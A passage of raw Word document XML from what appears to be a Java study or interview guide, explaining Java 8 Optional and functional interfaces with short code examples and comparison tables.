        <w:t>expressive, readable, and null-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way to handle optional (i.e., potentially absent) values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53810635" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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3838F03">
          <v:rect id="_x0000_i1717" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7F8DF" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422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Purposes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53733FC7" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ull Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07629B0D" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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liminates the need for explicit null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2E875" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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events unintentional dereferencing of null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FCCD2F" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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lear Intent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18586782" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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ignals clearly that a value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>might</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> be absent (vs returning null, which is implicit and error-prone).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12879B21" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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tter API Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756FD9A" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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a method returns Optional&lt;T&gt;, it tells the caller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BFB1F" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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method may return a value, or it may not — handle both cases."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDCFF9" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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unctional Programming Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5032AA" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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ovides methods like map(), flatMap(), filter() to allow chaining and functional-style operations without breaking the flow with null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B467DF" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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91248D9">
          <v:rect id="_x0000_i1718" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501993A" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422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Traditional vs. Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FF6EC" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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ithout Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190A60E" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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tring name = getName(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F5DB2" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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name != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA642E" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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name.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E235D7" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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B386021" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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ith Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCCC8E6" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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ptional&lt;String&gt; name = getNameOptional();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07440396" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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name.ifPresent(n -&gt; System.out.println(n.toUpperCase()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A57D9" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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D816FBE">
          <v:rect id="_x0000_i1719" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A190F2D" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422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92"/>
        <w:gridCol w:w="1827"/>
        <w:gridCol w:w="1682"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="54FDCB05" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E68080B" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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4809478A" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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ith Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="270A6628" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F"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ithout Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="1B5A8993" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27626B64" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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ull safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05BE9660" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B9B9971" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="7E4A8A1B" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5C9A40" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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courages best practices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A967EE4" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8EAB32" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="321DCE80" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CA1320F" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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lps avoid bugs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F0A33DB" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65741A32" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="6D3F1AA7" w14:textId="77777777" w:rsidTr="0018607F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C87D247" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F"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nctional friendly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419AB619" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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Yes (map, filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6748C1C9" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="543EB9D2" w14:textId="0E68770A" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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C8110A5">
          <v:rect id="_x0000_i1720" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424D436" w14:textId="77777777" w:rsidR="00BE2B45" w:rsidRPr="00CE4B95" w:rsidRDefault="00BE2B45">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="_Toc196307714"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 8 Functional interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w14:paraId="7E3D5132" w14:textId="1D6BE330" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Java 8 Functional Interface – Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160DEA2"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Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is an interface that has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. These interfaces are designed to represent a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, making them ideal for use with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expression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method references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduced in Java 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C499CE1" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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78ECF8A">
          <v:rect id="_x0000_i1721" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F144E23" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422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haracteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09066BDC" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Must have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566493EA" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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an have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple default or static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B4C4D" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104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nnotated with @FunctionalInterface (optional but recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB0D13" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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CBCD739">
          <v:rect id="_x0000_i1722" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F316959" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A32DD5"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10222E8E"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interface MyFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A60BFE7"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doSomething(); // only one abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEAAE1"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3DE48CA" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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3996360">
          <v:rect id="_x0000_i1723" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B390F" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422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s of Built-in Functional Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE8DFD2"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 8 provides several functional interfaces in the java.util.function packag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7"/>
        <w:gridCol w:w="1614"/>
        <w:gridCol w:w="3514"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="60A95B75" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62DF604A" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E"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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7DF164" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E"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bstract Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30A2627E" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="0013430E" w:rsidP="00B422C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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="6B26FDA7" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C266F9E"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nction&lt;T, R&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4994F19D"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 apply(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7205FF7B"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verts input type T to output type R</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3D3BD27D" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51DDE621"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edicate&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48D26092"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oolean test(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49CFA00C"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hecks a condition (returns true/false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="11C99BDA" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B06CEFE"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sumer&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3FA7FD"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oid accept(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181C53DA"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erforms an action on input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="101E8937" w14:textId="77777777" w:rsidTr="0013430E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E6CC2DF"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pplier&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7CEC8F"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 get()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C8BF40E"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pplies a value (no input)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E82CB6F" w14:textId="77777777" w:rsidR="0013430E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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862027">
          <v:rect id="_x0000_i1724" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
